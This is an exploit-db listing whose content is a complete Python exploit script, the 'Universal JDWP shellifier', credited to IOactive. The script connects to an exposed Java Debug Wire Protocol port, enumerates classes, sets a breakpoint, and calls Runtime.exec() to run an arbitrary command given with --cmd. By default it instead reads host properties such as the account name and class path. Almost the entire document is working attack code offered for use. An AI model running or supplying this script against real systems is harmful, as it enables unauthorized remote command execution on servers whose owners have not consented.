Java Debug Wire Protocol (JDWP) – Remote Code Execution

  • 作者: IOactive
    日期: 2016-12-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46501/
    #!/usr/bin/python
    ################################################################################
    #
    # Universal JDWP shellifier
    #
    # @_hugsy_
    #
    # And special cheers to @lanjelot
    #
    
    import socket
    import time
    import sys
    import struct
    import urllib
    import argparse
    
    
    
    ################################################################################
    #
    # JDWP protocol variables
    #
    # Magic string sent by JDWPClient.handshake(), which expects the peer to
    # send the very same string back.
    HANDSHAKE = "JDWP-Handshake"
    
    # Values of the "flags" byte of a packet header. read_reply() compares the
    # received flags against REPLY_PACKET_TYPE before looking at the error code.
    REQUEST_PACKET_TYPE = 0x00
    REPLY_PACKET_TYPE = 0x80
    
    # Command signatures
    # Each signature is a (command set, command) pair; create_packet() unpacks
    # the pair into the two single-byte fields that end the packet header.
    VERSION_SIG = (1, 1)
    CLASSESBYSIGNATURE_SIG= (1, 2)
    ALLCLASSES_SIG= (1, 3)
    ALLTHREADS_SIG= (1, 4)
    IDSIZES_SIG = (1, 7)
    CREATESTRING_SIG= (1, 11)
    SUSPENDVM_SIG = (1, 8)
    RESUMEVM_SIG= (1, 9)
    SIGNATURE_SIG = (2, 1)
    FIELDS_SIG= (2, 4)
    METHODS_SIG = (2, 5)
    GETVALUES_SIG = (2, 6)
    CLASSOBJECT_SIG = (2, 11)
    INVOKESTATICMETHOD_SIG= (3, 3)
    REFERENCETYPE_SIG = (9, 1)
    INVOKEMETHOD_SIG= (9, 6)
    STRINGVALUE_SIG = (10, 1)
    THREADNAME_SIG= (11, 1)
    THREADSUSPEND_SIG = (11, 2)
    THREADRESUME_SIG= (11, 3)
    THREADSTATUS_SIG= (11, 4)
    EVENTSET_SIG= (15, 1)
    EVENTCLEAR_SIG= (15, 2)
    EVENTCLEARALL_SIG = (15, 3)
    
    # Other codes
    # MODKIND_* values are used as the "kind" byte of an event modifier
    # (runtime_exec() pairs MODKIND_LOCATIONONLY with a location blob).
    MODKIND_COUNT = 1
    MODKIND_THREADONLY= 2
    MODKIND_CLASSMATCH= 5
    MODKIND_LOCATIONONLY= 7
    # Event kind passed to send_event() / clear_event().
    EVENT_BREAKPOINT= 2
    # send_event() always writes SUSPEND_ALL as the second byte of the request.
    SUSPEND_EVENTTHREAD = 1
    SUSPEND_ALL = 2
    # NOTE(review): presumably JDWP error codes; not referenced in this file.
    NOT_IMPLEMENTED = 99
    VM_DEAD = 112
    INVOKE_SINGLE_THREADED= 2
    # Type tags prefixed to tagged values: 76 == ord('L'), 115 == ord('s').
    TAG_OBJECT= 76
    TAG_STRING= 115
    # First byte of the location blob built in runtime_exec().
    TYPE_CLASS= 1
    
    
    ################################################################################
    #
    # JDWP client class
    #
    class JDWPClient:
        """Small client for the Java Debug Wire Protocol (JDWP) over TCP.

        The client performs the handshake, caches the class / method / field
        listings returned by the VM and offers helpers to build and parse
        packets.  Every payload is handled as ``bytes`` and packed with
        ``struct`` so the class behaves identically on Python 2 and Python 3.
        """

        # Size in bytes of the fixed header that starts every packet:
        # length (4) + id (4) + flags (1) + cmdset/cmd or error code (2).
        HEADER_SIZE = 11

        def __init__(self, host, port=8000):
            """Remember the target; no network activity happens here."""
            self.host = host
            self.port = port
            self.socket = None  # set by handshake()
            self.methods = {}   # refTypeId -> list of method entries
            self.fields = {}    # refTypeId -> list of field entries
            self.id = 0x01      # id of the next outgoing packet

        # ------------------------------------------------------------------
        # low level helpers
        # ------------------------------------------------------------------
        @staticmethod
        def _to_bytes(data, encoding="utf-8"):
            """Return *data* as bytes, encoding text with *encoding* if needed."""
            if isinstance(data, bytes):
                return data
            return data.encode(encoding)

        @staticmethod
        def _to_text(raw):
            """Return *raw* as a native ``str``.

            On Python 2 ``bytes`` is ``str`` and the value is returned untouched;
            on Python 3 it is decoded so that comparisons against ordinary
            string literals (class signatures, thread names...) keep working.
            """
            if isinstance(raw, str):
                return raw
            return raw.decode("utf-8", "replace")

        def _recv_exact(self, size):
            """Read exactly *size* bytes from the socket.

            Raises:
                Exception: if the peer closes the connection before *size*
                    bytes were received.
            """
            chunks = []
            remaining = size
            while remaining > 0:
                chunk = self.socket.recv(remaining)
                if not chunk:
                    raise Exception("Connection closed by remote host")
                chunks.append(chunk)
                remaining -= len(chunk)
            return b"".join(chunks)

        def create_packet(self, cmdsig, data=""):
            """Build a command packet for *cmdsig* = (command set, command).

            The packet id is taken from ``self.id``, which is then advanced by 2.
            """
            # latin-1 maps code points 0-255 onto the same byte values, so a
            # chr()-built payload survives unchanged.
            payload = self._to_bytes(data, "latin-1")
            cmdset, cmd = cmdsig
            flags = 0x00
            pkt = struct.pack(">IIBBB", len(payload) + self.HEADER_SIZE,
                              self.id, flags, cmdset, cmd)
            self.id += 2
            return pkt + payload

        def read_reply(self):
            """Read one packet from the socket and return its payload.

            Exactly one packet is consumed: the header announces the total
            length and only that many bytes are read, so data belonging to a
            following packet stays in the socket.

            Raises:
                Exception: on a reply packet carrying a non-zero error code, or
                    when the connection is closed mid-packet.
            """
            header = self._recv_exact(self.HEADER_SIZE)
            pktlen, _pkt_id, flags, errcode = struct.unpack(">IIBH", header)
            # Drain the body first so the stream stays aligned even on error.
            body = self._recv_exact(max(pktlen - self.HEADER_SIZE, 0))
            # For non-reply packets these two bytes are cmdset/cmd, not an error.
            if errcode and flags == REPLY_PACKET_TYPE:
                raise Exception("Received errcode %d" % errcode)
            return body

        def parse_entries(self, buf, formats, explicit=True):
            """Decode *buf* into a list of dicts described by *formats*.

            Args:
                buf: raw payload.
                formats: sequence of ``(fmt, name)``.  ``fmt`` is ``"L"``/8
                    (8-byte integer), ``"I"``/4 (4-byte integer), ``"S"``
                    (length-prefixed string), ``"C"`` (single byte) or ``"Z"``
                    (tagged value; only string and int tags are supported).
                explicit: when true the payload starts with a 4-byte entry
                    count, otherwise exactly one entry is decoded.

            Raises:
                Exception: on an unknown format or unsupported value tag.
                struct.error: if *buf* is too short.
            """
            index = 0
            if explicit:
                nb_entries = struct.unpack_from(">I", buf, 0)[0]
                index = 4
            else:
                nb_entries = 1

            entries = []
            for _ in range(nb_entries):
                data = {}
                for fmt, name in formats:
                    if fmt == "L" or fmt == 8:
                        data[name] = struct.unpack_from(">Q", buf, index)[0]
                        index += 8
                    elif fmt == "I" or fmt == 4:
                        data[name] = struct.unpack_from(">I", buf, index)[0]
                        index += 4
                    elif fmt == "S":
                        size = struct.unpack_from(">I", buf, index)[0]
                        start = index + 4
                        data[name] = self._to_text(buf[start:start + size])
                        index = start + size
                    elif fmt == "C":
                        data[name] = struct.unpack_from(">B", buf, index)[0]
                        index += 1
                    elif fmt == "Z":
                        tag = struct.unpack_from(">B", buf, index)[0]
                        if tag == 115:  # ord('s'): string object reference
                            # Fall back to 8 bytes when idsizes() was not run.
                            id_size = getattr(self, "objectIDSize", 8)
                            end = index + 1 + id_size
                            data[name] = self.solve_string(buf[index + 1:end])
                            index = end
                        elif tag == 73:  # ord('I'): 4-byte integer
                            data[name] = struct.unpack_from(">I", buf, index + 1)[0]
                            index += 5
                        else:
                            # The value width is unknown, so parsing cannot
                            # continue safely past this point.
                            raise Exception("Unsupported value tag %d" % tag)
                    else:
                        raise Exception("Unknown format")
                entries.append(data)

            return entries

        def format(self, fmt, value):
            """Pack integer *value* as big-endian (``"L"``/8 or ``"I"``/4)."""
            if fmt == "L" or fmt == 8:
                return struct.pack(">Q", value)
            if fmt == "I" or fmt == 4:
                return struct.pack(">I", value)
            raise Exception("Unknown format")

        def unformat(self, fmt, value):
            """Unpack a big-endian integer from the start of *value*."""
            if fmt == "L" or fmt == 8:
                return struct.unpack(">Q", value[:8])[0]
            if fmt == "I" or fmt == 4:
                return struct.unpack(">I", value[:4])[0]
            raise Exception("Unknown format")

        # ------------------------------------------------------------------
        # session management
        # ------------------------------------------------------------------
        def start(self):
            """Connect, then fetch ID sizes, version and the class list."""
            self.handshake(self.host, self.port)
            self.idsizes()
            self.getversion()
            self.allclasses()

        def handshake(self, host, port):
            """Open the TCP connection and exchange the handshake string.

            On success the connected socket is stored in ``self.socket``; on
            any failure the socket is closed before the exception is raised.

            Raises:
                Exception: if the connection or the handshake fails.
            """
            magic = self._to_bytes(HANDSHAKE, "ascii")
            s = socket.socket()
            try:
                s.connect((host, port))
            except socket.error as msg:
                s.close()
                raise Exception("Failed to connect: %s" % msg)

            try:
                s.sendall(magic)
                reply = b""
                # recv() may return fewer bytes than requested.
                while len(reply) < len(magic):
                    chunk = s.recv(len(magic) - len(reply))
                    if not chunk:
                        break
                    reply += chunk
            except socket.error as msg:
                s.close()
                raise Exception("Failed to handshake: %s" % msg)

            if reply != magic:
                s.close()
                raise Exception("Failed to handshake")
            self.socket = s

        def leave(self):
            """Close the connection, if one is open."""
            sock = getattr(self, "socket", None)
            if sock is not None:
                sock.close()
                self.socket = None

        def getversion(self):
            """Query the VM version and store each reply field as an attribute."""
            self.socket.sendall(self.create_packet(VERSION_SIG))
            buf = self.read_reply()
            formats = [('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"),
                       ('S', "vmVersion"), ('S', "vmName")]
            for entry in self.parse_entries(buf, formats, False):
                for name, value in entry.items():
                    setattr(self, name, value)

        @property
        def version(self):
            """Human readable ``"<vmName> - <vmVersion>"`` string."""
            return "%s - %s" % (self.vmName, self.vmVersion)

        def idsizes(self):
            """Query the ID sizes and store each one as an attribute."""
            self.socket.sendall(self.create_packet(IDSIZES_SIG))
            buf = self.read_reply()
            formats = [("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"),
                       ("I", "referenceTypeIDSize"), ("I", "frameIDSize")]
            for entry in self.parse_entries(buf, formats, False):
                for name, value in entry.items():
                    setattr(self, name, value)

        # ------------------------------------------------------------------
        # threads, classes, methods, fields
        # ------------------------------------------------------------------
        def allthreads(self):
            """Return the thread list, querying the VM only on first use."""
            if not hasattr(self, "threads"):
                self.socket.sendall(self.create_packet(ALLTHREADS_SIG))
                buf = self.read_reply()
                formats = [(self.objectIDSize, "threadId")]
                self.threads = self.parse_entries(buf, formats)
            return self.threads

        def get_thread_by_name(self, name):
            """Return the thread entry whose name equals *name*, or ``None``."""
            self.allthreads()
            for t in self.threads:
                threadId = self.format(self.objectIDSize, t["threadId"])
                self.socket.sendall(self.create_packet(THREADNAME_SIG, data=threadId))
                buf = self.read_reply()
                if len(buf) and name == self.readstring(buf):
                    return t
            return None

        def allclasses(self):
            """Return the class list, querying the VM only on first use."""
            if not hasattr(self, "classes"):
                self.socket.sendall(self.create_packet(ALLCLASSES_SIG))
                buf = self.read_reply()
                formats = [('C', "refTypeTag"),
                           (self.referenceTypeIDSize, "refTypeId"),
                           ('S', "signature"),
                           ('I', "status")]
                self.classes = self.parse_entries(buf, formats)
            return self.classes

        def get_class_by_name(self, name):
            """Return the cached class entry matching signature *name*.

            The comparison is case-insensitive; ``None`` is returned when no
            class matches.  ``allclasses()`` must have been called before.
            """
            wanted = name.lower()
            for entry in self.classes:
                if entry["signature"].lower() == wanted:
                    return entry
            return None

        def get_methods(self, refTypeId):
            """Return (and cache) the method entries of class *refTypeId*."""
            if refTypeId not in self.methods:
                refId = self.format(self.referenceTypeIDSize, refTypeId)
                self.socket.sendall(self.create_packet(METHODS_SIG, data=refId))
                buf = self.read_reply()
                formats = [(self.methodIDSize, "methodId"),
                           ('S', "name"),
                           ('S', "signature"),
                           ('I', "modBits")]
                self.methods[refTypeId] = self.parse_entries(buf, formats)
            return self.methods[refTypeId]

        def get_method_by_name(self, name):
            """Return the first cached method named *name* (case-insensitive).

            Every class loaded through ``get_methods()`` is searched; ``None``
            is returned when nothing matches.
            """
            wanted = name.lower()
            for entries in self.methods.values():
                for entry in entries:
                    if entry["name"].lower() == wanted:
                        return entry
            return None

        def getfields(self, refTypeId):
            """Return (and cache) the field entries of class *refTypeId*."""
            if refTypeId not in self.fields:
                refId = self.format(self.referenceTypeIDSize, refTypeId)
                self.socket.sendall(self.create_packet(FIELDS_SIG, data=refId))
                buf = self.read_reply()
                formats = [(self.fieldIDSize, "fieldId"),
                           ('S', "name"),
                           ('S', "signature"),
                           ('I', "modbits")]
                self.fields[refTypeId] = self.parse_entries(buf, formats)
            return self.fields[refTypeId]

        def getvalue(self, refTypeId, fieldId):
            """Fetch one field value; returns a ``{"value": ...}`` dict."""
            data = self.format(self.referenceTypeIDSize, refTypeId)
            data += struct.pack(">I", 1)  # number of requested fields
            data += self.format(self.fieldIDSize, fieldId)
            self.socket.sendall(self.create_packet(GETVALUES_SIG, data=data))
            buf = self.read_reply()
            return self.parse_entries(buf, [("Z", "value")])[0]

        # ------------------------------------------------------------------
        # strings
        # ------------------------------------------------------------------
        def createstring(self, data):
            """Send *data* as a new string; returns ``[{"objId": id}]``."""
            buf = self.buildstring(data)
            self.socket.sendall(self.create_packet(CREATESTRING_SIG, data=buf))
            buf = self.read_reply()
            return self.parse_entries(buf, [(self.objectIDSize, "objId")], False)

        def buildstring(self, data):
            """Encode *data* as a 4-byte length followed by its UTF-8 bytes."""
            raw = self._to_bytes(data, "utf-8")
            # The prefix is the *byte* length, which differs from the character
            # count for non-ASCII text.
            return struct.pack(">I", len(raw)) + raw

        def readstring(self, data):
            """Decode a length-prefixed string from the start of *data*."""
            size = struct.unpack(">I", data[:4])[0]
            return self._to_text(data[4:4 + size])

        def solve_string(self, objId):
            """Return the value of the string whose packed ID is *objId*."""
            self.socket.sendall(self.create_packet(STRINGVALUE_SIG, data=objId))
            buf = self.read_reply()
            if len(buf):
                return self.readstring(buf)
            return ""

        # ------------------------------------------------------------------
        # VM and thread control
        # ------------------------------------------------------------------
        def suspendvm(self):
            """Send the suspend-VM command and wait for its reply."""
            self.socket.sendall(self.create_packet(SUSPENDVM_SIG))
            self.read_reply()

        def resumevm(self):
            """Send the resume-VM command and wait for its reply."""
            self.socket.sendall(self.create_packet(RESUMEVM_SIG))
            self.read_reply()

        def _invoke(self, cmdsig, prefix, args):
            """Send an invocation request and return the raw reply payload.

            *prefix* holds the already packed IDs; *args* are already packed
            tagged values.  The trailing 4-byte options field is always 0.
            """
            data = prefix
            data += struct.pack(">I", len(args))
            data += b"".join(args)
            data += struct.pack(">I", 0)
            self.socket.sendall(self.create_packet(cmdsig, data=data))
            return self.read_reply()

        def invokestatic(self, classId, threadId, methId, *args):
            """Invoke static method *methId* of *classId* in thread *threadId*."""
            prefix = self.format(self.referenceTypeIDSize, classId)
            prefix += self.format(self.objectIDSize, threadId)
            prefix += self.format(self.methodIDSize, methId)
            return self._invoke(INVOKESTATICMETHOD_SIG, prefix, args)

        def invoke(self, objId, threadId, classId, methId, *args):
            """Invoke instance method *methId* on *objId* in thread *threadId*."""
            prefix = self.format(self.objectIDSize, objId)
            prefix += self.format(self.objectIDSize, threadId)
            prefix += self.format(self.referenceTypeIDSize, classId)
            prefix += self.format(self.methodIDSize, methId)
            return self._invoke(INVOKEMETHOD_SIG, prefix, args)

        def query_thread(self, threadId, kind):
            """Send thread command *kind* for *threadId* and consume the reply."""
            data = self.format(self.objectIDSize, threadId)
            self.socket.sendall(self.create_packet(kind, data=data))
            self.read_reply()

        def suspend_thread(self, threadId):
            """Suspend thread *threadId*."""
            return self.query_thread(threadId, THREADSUSPEND_SIG)

        def status_thread(self, threadId):
            """Send a status request for *threadId* (the reply is discarded)."""
            return self.query_thread(threadId, THREADSTATUS_SIG)

        def resume_thread(self, threadId):
            """Resume thread *threadId*."""
            return self.query_thread(threadId, THREADRESUME_SIG)

        # ------------------------------------------------------------------
        # events
        # ------------------------------------------------------------------
        def send_event(self, eventCode, *args):
            """Register an event request and return its request ID.

            Each item of *args* is ``(modifier kind, packed modifier data)``.
            """
            data = struct.pack(">BBI", eventCode, SUSPEND_ALL, len(args))
            for kind, option in args:
                data += struct.pack(">B", kind)
                data += option
            self.socket.sendall(self.create_packet(EVENTSET_SIG, data=data))
            buf = self.read_reply()
            return struct.unpack_from(">I", buf, 0)[0]

        def clear_event(self, eventCode, rId):
            """Remove the event request *rId* of kind *eventCode*."""
            data = struct.pack(">BI", eventCode, rId)
            self.socket.sendall(self.create_packet(EVENTCLEAR_SIG, data=data))
            self.read_reply()

        def clear_events(self):
            """Send the clear-all event command and wait for its reply."""
            self.socket.sendall(self.create_packet(EVENTCLEARALL_SIG))
            self.read_reply()

        def wait_for_event(self):
            """Block until the next packet arrives and return its payload."""
            return self.read_reply()

        def parse_event_breakpoint(self, buf, eventId):
            """Extract ``(requestId, threadId, -1)`` from an event payload.

            Returns ``None`` when the payload is too short to hold a request ID
            and a thread ID, or when its request ID differs from *eventId*.
            """
            # Layout read here: request ID at bytes 6..9, thread ID from byte 10.
            if len(buf) < 10 + self.objectIDSize:
                return None
            rId = struct.unpack_from(">I", buf, 6)[0]
            if rId != eventId:
                return None
            tId = self.unformat(self.objectIDSize, buf[10:10 + self.objectIDSize])
            loc = -1  # don't care
            return rId, tId, loc
    
    
    
    def runtime_exec(jdwp, args):
        """Drive the whole session: locate classes, break, then run the action.

        Args:
            jdwp: a started ``JDWPClient``.
            args: parsed command line; reads ``target``, ``port``,
                ``break_on``, ``break_on_class``, ``break_on_method`` and ``cmd``.

        Returns:
            ``True`` when the selected action reported success, ``False``
            when a lookup failed or the action itself failed.
        """
        print("[+] Targeting '%s:%d'" % (args.target, args.port))
        print("[+] Reading settings for '%s'" % jdwp.version)

        # 1. get Runtime class reference
        runtimeClass = jdwp.get_class_by_name("Ljava/lang/Runtime;")
        if runtimeClass is None:
            print("[-] Cannot find class Runtime")
            return False
        print("[+] Found Runtime class: id=%x" % runtimeClass["refTypeId"])

        # 2. get getRuntime() meth reference
        jdwp.get_methods(runtimeClass["refTypeId"])
        getRuntimeMeth = jdwp.get_method_by_name("getRuntime")
        if getRuntimeMeth is None:
            print("[-] Cannot find method Runtime.getRuntime()")
            return False
        print("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth["methodId"])

        # 3. setup breakpoint on frequently called method
        c = jdwp.get_class_by_name(args.break_on_class)
        if c is None:
            print("[-] Could not access class '%s'" % args.break_on_class)
            print("[-] It is possible that this class is not used by application")
            print("[-] Test with another one with option `--break-on`")
            return False

        jdwp.get_methods(c["refTypeId"])
        m = jdwp.get_method_by_name(args.break_on_method)
        if m is None:
            print("[-] Could not access method '%s'" % args.break_on)
            return False

        # struct.pack yields bytes on both Python 2 and 3, unlike chr().
        location = struct.pack(">B", TYPE_CLASS)
        location += jdwp.format(jdwp.referenceTypeIDSize, c["refTypeId"])
        location += jdwp.format(jdwp.methodIDSize, m["methodId"])
        location += struct.pack(">II", 0, 0)
        modifiers = [(MODKIND_LOCATIONONLY, location)]
        rId = jdwp.send_event(EVENT_BREAKPOINT, *modifiers)
        print("[+] Created break event id=%x" % rId)

        # 4. resume vm and wait for event
        jdwp.resumevm()

        print("[+] Waiting for an event on '%s'" % args.break_on)
        while True:
            buf = jdwp.wait_for_event()
            ret = jdwp.parse_event_breakpoint(buf, rId)
            if ret is not None:
                break

        rId, tId, _ = ret
        print("[+] Received matching event from thread %#x" % tId)

        jdwp.clear_event(EVENT_BREAKPOINT, rId)

        # 5. Now we can execute any code
        if args.cmd:
            succeeded = runtime_exec_payload(jdwp, tId, runtimeClass["refTypeId"],
                                             getRuntimeMeth["methodId"], args.cmd)
        else:
            # by default, only prints out few system properties
            succeeded = runtime_exec_info(jdwp, tId)

        # Always resume the VM, whatever the outcome of the action.
        jdwp.resumevm()

        # Do not claim success when the action reported a failure.
        if not succeeded:
            return False

        print("[!] Command successfully executed")
        return True
    
    
    def runtime_exec_info(jdwp, threadId):
        """Print a fixed set of system properties read through *jdwp*.

        Each property name is sent as a new string and passed to the static
        method named ``getProperty`` of ``Ljava/lang/System;``, invoked in
        thread *threadId*; the returned string is then printed.

        Returns:
            ``False`` if the class or method cannot be found or a string
            cannot be allocated, ``True`` otherwise.
        """
        #
        # This function calls java.lang.System.getProperties() and
        # displays OS properties (non-intrusive)
        #
        properties = {"java.version": "Java Runtime Environment version",
                      "java.vendor": "Java Runtime Environment vendor",
                      "java.vendor.url": "Java vendor URL",
                      "java.home": "Java installation directory",
                      "java.vm.specification.version": "Java Virtual Machine specification version",
                      "java.vm.specification.vendor": "Java Virtual Machine specification vendor",
                      "java.vm.specification.name": "Java Virtual Machine specification name",
                      "java.vm.version": "Java Virtual Machine implementation version",
                      "java.vm.vendor": "Java Virtual Machine implementation vendor",
                      "java.vm.name": "Java Virtual Machine implementation name",
                      "java.specification.version": "Java Runtime Environment specification version",
                      "java.specification.vendor": "Java Runtime Environment specification vendor",
                      "java.specification.name": "Java Runtime Environment specification name",
                      "java.class.version": "Java class format version number",
                      "java.class.path": "Java class path",
                      "java.library.path": "List of paths to search when loading libraries",
                      "java.io.tmpdir": "Default temp file path",
                      "java.compiler": "Name of JIT compiler to use",
                      "java.ext.dirs": "Path of extension directory or directories",
                      "os.name": "Operating system name",
                      "os.arch": "Operating system architecture",
                      "os.version": "Operating system version",
                      "file.separator": "File separator",
                      "path.separator": "Path separator",
                      "user.name": "User's account name",
                      "user.home": "User's home directory",
                      "user.dir": "User's current working directory"
                      }

        systemClass = jdwp.get_class_by_name("Ljava/lang/System;")
        if systemClass is None:
            print("[-] Cannot find class java.lang.System")
            return False

        jdwp.get_methods(systemClass["refTypeId"])
        getPropertyMeth = jdwp.get_method_by_name("getProperty")
        if getPropertyMeth is None:
            print("[-] Cannot find method System.getProperty()")
            return False

        # Single-byte tags as bytes, valid on both Python 2 and 3.
        object_tag = struct.pack(">B", TAG_OBJECT)
        string_tag = struct.pack(">B", TAG_STRING)

        for propStr, propDesc in properties.items():
            propObjIds = jdwp.createstring(propStr)
            if len(propObjIds) == 0:
                print("[-] Failed to allocate command")
                return False
            propObjId = propObjIds[0]["objId"]

            data = [object_tag + jdwp.format(jdwp.objectIDSize, propObjId)]
            buf = jdwp.invokestatic(systemClass["refTypeId"],
                                    threadId,
                                    getPropertyMeth["methodId"],
                                    *data)
            # Slicing (not indexing) also copes with an empty reply.
            if buf[0:1] != string_tag:
                print("[-] %s: Unexpected returned type: expecting String" % propStr)
            else:
                retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1 + jdwp.objectIDSize])
                # Use the client passed in, not a module-level global.
                res = jdwp.solve_string(jdwp.format(jdwp.objectIDSize, retId))
                print("[+] Found %s '%s'" % (propDesc, res))

        return True
    
    
    def runtime_exec_payload(jdwp, threadId, runtimeClassId, getRuntimeMethId, command):
        """Pass *command* to the method named ``exec`` through *jdwp*.

        Args:
            jdwp: client used for every request.
            threadId: thread in which the invocations are performed.
            runtimeClassId: reference type ID used for both invocations.
            getRuntimeMethId: ID of the static method invoked first; its
                returned object is the receiver of the ``exec`` call.
            command: string sent as the single argument of ``exec``.

        Returns:
            ``True`` when both invocations returned an object, ``False``
            otherwise.
        """
        #
        # This function will invoke command as a payload, which will be running
        # with JVM privilege on host (intrusive).
        #
        print("[+] Selected payload '%s'" % command)

        # Single-byte tag as bytes, valid on both Python 2 and 3.
        object_tag = struct.pack(">B", TAG_OBJECT)

        # 1. allocating string containing our command to exec()
        cmdObjIds = jdwp.createstring(command)
        if len(cmdObjIds) == 0:
            print("[-] Failed to allocate command")
            return False
        cmdObjId = cmdObjIds[0]["objId"]
        print("[+] Command string object created id:%x" % cmdObjId)

        # 2. use context to get Runtime object
        buf = jdwp.invokestatic(runtimeClassId, threadId, getRuntimeMethId)
        # Slicing (not indexing) also copes with an empty reply.
        if buf[0:1] != object_tag:
            print("[-] Unexpected returned type: expecting Object")
            return False
        rt = jdwp.unformat(jdwp.objectIDSize, buf[1:1 + jdwp.objectIDSize])

        # unformat() never returns None; an object ID of 0 is a null reference.
        if not rt:
            print("[-] Failed to invoke Runtime.getRuntime()")
            return False
        print("[+] Runtime.getRuntime() returned context id:%#x" % rt)

        # 3. find exec() method
        execMeth = jdwp.get_method_by_name("exec")
        if execMeth is None:
            print("[-] Cannot find method Runtime.exec()")
            return False
        print("[+] found Runtime.exec(): id=%x" % execMeth["methodId"])

        # 4. call exec() in this context with the alloc-ed string
        data = [object_tag + jdwp.format(jdwp.objectIDSize, cmdObjId)]
        buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth["methodId"], *data)
        if buf[0:1] != object_tag:
            print("[-] Unexpected returned type: expecting Object")
            return False

        retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1 + jdwp.objectIDSize])
        print("[+] Runtime.exec() successful, retId=%x" % retId)

        return True
    
    
    def str2fqclass(s):
        """Split a dotted ``package.Class.method`` path.

        Returns:
            ``(classname, method)`` where *classname* is the part before the
            last dot rewritten as ``L<path with slashes>;`` and *method* is
            the part after it.

        Exits the program with status 1 (after printing a message) when *s*
        has no dot or when either side of the last dot is empty.
        """
        path, dot, method = s.rpartition('.')
        # "Foo." or ".bar" would otherwise give an empty method or class "L;".
        if not dot or not path or not method:
            print("Cannot parse path")
            sys.exit(1)

        classname = 'L' + path.replace('.', '/') + ';'
        return classname, method
    
    
    if __name__ == "__main__":
        # Command line entry point: parse options, run the session and exit
        # with status 0 on success or 1 on failure.
        parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_",
                                         formatter_class=argparse.ArgumentDefaultsHelpFormatter)

        parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True)
        parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port")

        parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD",
                            default="java.net.ServerSocket.accept", help="Specify full path to method to break on")
        parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND",
                            help="Specify command to execute remotely")

        args = parser.parse_args()

        # Derived values read later by runtime_exec().
        args.break_on_class, args.break_on_method = str2fqclass(args.break_on)

        retcode = 0
        # Bound before the try block so the finally clause can always test it.
        cli = None

        try:
            cli = JDWPClient(args.target, args.port)
            cli.start()

            if not runtime_exec(cli, args):
                print("[-] Exploit failed")
                retcode = 1

        except KeyboardInterrupt:
            print("[+] Exiting on user's request")

        except Exception as e:
            print("[-] Exception: %s" % e)
            retcode = 1

        finally:
            # Close the connection on every path, but only if one was opened
            # (the socket attribute is missing or None when connecting failed).
            if cli is not None and getattr(cli, "socket", None) is not None:
                cli.leave()

        sys.exit(retcode)